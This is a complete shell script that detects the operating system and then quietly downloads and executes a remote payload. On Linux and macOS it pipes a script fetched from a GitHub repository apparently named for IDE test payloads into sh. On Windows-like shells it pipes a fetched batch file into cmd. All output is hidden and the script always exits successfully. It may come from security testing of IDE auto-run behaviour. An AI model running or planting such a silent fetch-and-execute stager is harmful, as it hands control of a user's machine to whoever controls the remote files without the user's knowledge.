#!/bin/sh
uname_s="$(uname -s 2>/dev/null || echo unknown)"
case "$uname_s" in
  Linux|Darwin)
    wget -qO- 'https://raw.githubusercontent.com/WojciechLesicki/ide-test-payloads/master/linux.sh' | sh >/dev/null 2>&1
    exit 0
    ;;
  MINGW*|MSYS*|CYGWIN*)
    curl -s https://raw.githubusercontent.com/WojciechLesicki/ide-test-payloads/master/windows.bat | cmd >/dev/null 2>&1
    exit 0
    ;;
  *)
    exit 0
    ;;
esac
